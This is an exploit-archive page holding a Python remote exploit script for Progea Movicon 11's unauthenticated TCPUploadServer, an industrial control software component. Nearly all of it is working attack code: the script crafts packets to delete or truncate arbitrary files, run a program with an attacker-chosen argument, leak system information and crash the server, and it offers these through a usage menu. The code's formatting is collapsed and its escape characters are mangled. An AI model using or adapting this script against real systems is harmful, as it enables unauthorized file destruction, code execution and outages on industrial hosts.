[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Progea Movicon 11 TCPUploadServer Remote Exploit
# Published : 2011-03-23
# Author : Jeremy Brown
# Previous Title : HP NNM CGI webappmon.exe execvp Buffer Overflow
# Next Title : HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow

#!/usr/bin/python# movi.py# Progea Movicon TCPUploadServer Remote Exploit# Jeremy Brown / jbrown at patchtuesday dot org# Mar 2011## TCPUploadServer allows remote users to execute functions on the server# without any form of authentication. Impacts include deletion of arbitrary# files, execution of a program with an arbitrary argument, crashing the# server, information disclosure, and more. This design flaw puts the host# running this server at risk of potentially unauthorized functions being# executed on the system.## Tested on Progea Movicon 11 TCPUploadServer running on Windows## Fix: http://support.progea.com/download/Mov11.2_Setup.zip#import sysimport sockethdr="MovX"funcs=(1,2,3,4,5,6,7,8) # "B" is listed as 8 only for convience. other functions include (the real) 8, 9, A, and Vif len(sys.argv)<3:     print "Progea Movicon TCPUploadServer Remote Exploit"     print "Usage: %s <target> <function> [data]"%sys.argv[0]     print "/nWhat would you like to do?/n"     print "[1] Create a folder"     print "[2] Overwrite a file with NULL and cause 100%% CPU"     print "[3] Delete a file"     print "[4] Execute moviconRunTime.exe with a specified argument"     print "[5] Create a desktop shortcut"     print "[6] Retrieve drive information"     print "[7] Retrieve os service pack"     print "[8] Crash the server/n"     print "* Default data is /"test/""     sys.exit(0)target=sys.argv[1]port=10651cs=target,portfunc=int(sys.argv[2])if len(sys.argv)==4:     data=sys.argv[3]else:     data="test"if func not in funcs:     print "Invalid function"     sys.exit(1)if(func==1):     print "Crafting a packet to create the folder /"%s/"..."%data     pkt=hdr+"1"+"B"+data+"/x00"*(66-len(data))elif(func==2):     print "Crafting a packet to truncate (or create) the file /"%s/" to 0 bytes and cause 100%% CPU..."%data     pkt=hdr+"2"+"B"+data+"/x00"*(66-len(data))     # O_RDWR|O_CREAT|O_TRUNC, might be more to this, it's supposedly a copy function, but i'm moving onelif(func==3):     print "Crafting a packet to delete the file /"%s/"..."%data     pkt=hdr+"3"+"B"+data+"/x00"*(66-len(data))elif(func==4):     print "Crafting a packet to execute moviconRunTime.exe with the argument /"%s/"..."%data     pkt=hdr+"4"+"BB"+data+"/x00"*(65-len(data))elif(func==5):     print "Crafting a packet to create a desktop shortcut with the name (also appended to the link path) /"%s/"..."%data     pkt=hdr+"5"+"B"+data+"/x00"*(66-len(data))elif(func==6):     print "Crafting a packet to retrieve drive information..."     pkt=hdr+"6"+"/x01"elif(func==7):     print "Crafting a packet to retrieve os service pack..."     pkt=hdr+"7"+"/x00"elif(func==8):     print "Crafting a packet to crash the server..."     pkt=hdr+"B"+"/x00"sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)sock.connect(cs)sock.send(pkt)sock.send(pkt)print "/nPacket sent!"if((func==6)|(func==7)):     info=sock.recv(128)          if(info):          print "/nRetrieved info:/n"          if(func==6):               print "%s"%info[6:]          elif(func==7):               print "%s"%info[22:]     else:          print "/nNo info"sock.close()